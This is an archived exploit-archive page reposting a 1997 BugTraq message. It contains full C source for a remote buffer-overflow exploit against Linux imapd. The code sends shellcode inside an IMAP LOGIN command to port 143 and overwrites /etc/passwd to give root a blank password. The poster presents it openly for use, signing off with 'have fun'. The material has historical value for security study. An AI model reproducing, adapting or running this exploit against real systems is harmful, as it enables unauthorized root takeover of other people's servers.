Linux imapd remote overflow

Summary

Description:	Apparently a remote buffer overflow of imapd for linux. I think this is sort of old, and many other systems are affected.
Author:	Akylonius (aky@galeb.etf.bg.ac.yu)
Compromise:	root (local)
Vulnerable Systems:	The exploit is for Linux, but I believe that many systems using older IMAP daemons are vulnerable.
Date:	24 June 1997 was when this was posted, but I think this is much older

Details

Date: Tue, 24 Jun 1997 18:31:38 +0100
From: so1o@INSECURITY.ORG
To: BUGTRAQ@NETSPACE.ORG
Subject: Linux imapd remote vunerability.

Hi,

This may be really old news, but I haven't seen it here on BugTraq...

Linux Systems running the imapd server daemon can be remotely exploited
in a way that an attacker can gain root access to the system by changing
the root password field to being blank, I am not sure on the EXACT
details of this hole, and so I don't know the imapd versions that can be
exploited in this way.

I have enclosed the ONLY source for this exploit that I can find
anywhere, I have heard there are alot of other versions, including one
that spawns a root shell, I have this exploit in a precompiled version
which I can safely say work (I have only tested it on a Red Hat
machine), but I cannot obtain the source at this point for any other
versions of the remote exploit code.

So, here's the exploit source, that may not work at all :-)

/*

  This is the remote exploit of the hole in the imap daemon, for
  Linux.  The instruction code is doing open(), write(), and close()
  system calls, and  it adds a line root::0:0.. at the beggining of
  /etc/passwd (change to /etc/shadow if needed).  The  code needs to
  be self modifying since imapd turns everything to lowercase before
  it pushes it on the stack.  The problem  is that it  rewrites the
  first line of passwd/shadow,  therefore loosing the root password.

  I'm sorry, but I don't have time to add in the seek syscall.

  - Akylonius (aky@galeb.etf.bg.ac.yu) [1997]

  Modifications made on 5.1.97 to accept command line hostname,  with
  'h_to_ip' function that resolves it to an ip.  -  p1 (p1@el8.org)

*/

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

  struct hostent *h;
  struct sockaddr_in tmp;
  struct in_addr in;

  h = gethostbyname(hostname);

  if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

  memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
  system("clear");
  printf("\nIMAP Exploit for Linux.\n");
  printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
  printf(" Modifications: p1 (p1@el8.org)\n");
}

main(int argc, char **argv) {

  int fd;
  struct sockaddr_in sckdaddr;
  char *hostname;
  char buf[4092];
  int i=8;
  char realegg[] =
    "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
    "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
  char *point = realegg;
  buf[0]='*';
  buf[1]=' ';
  buf[2]='l';
  buf[3]='o';
  buf[4]='g';
  buf[5]='i';
  buf[6]='n';
  buf[7]=' ';

  banner();

  if (argc<2)  {
     printf("\nUsage: %s <hostname>\n\n", argv[0]);
     exit(-1);
  }

  hostname=argv[1];

  while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
    buf[i++]=0x90;

  while(*point)
    buf[i++]=*(point++);

  buf[i++]=0x83; /* ebp */
  buf[i++]=0xf3;
  buf[i++]=0xff;
  buf[i++]=0xbf;
  buf[i++]=0x88; /* ret adr */
  buf[i++]=0xf8;
  buf[i++]=0xff;
  buf[i++]=0xbf;

  buf[i++]=' ';
  buf[i++]='b';
  buf[i++]='a';
  buf[i++]='h';
  buf[i++]='\n';

  buf[i++]=0x0;

  if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
socket. \n");

  sckdaddr.sin_port=htons(143);
  sckdaddr.sin_family=AF_INET;
  sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

  if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
perror("Error with connecting. \n");

  printf("hmm: \n");
  getchar();
  write(fd,buf,strlen(buf)+1);
  printf("hmm: \n");
  close(fd);
}

That's all there is to it, have fun...

so1o

  ----------------------+----------------------
   Tetsu Khan           | The CodeZero.
   so1o@insecurity.org  | http://www.codez.com
  ----------------------+----------------------
    "I'm the self-inflicted, ice detonator.."

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: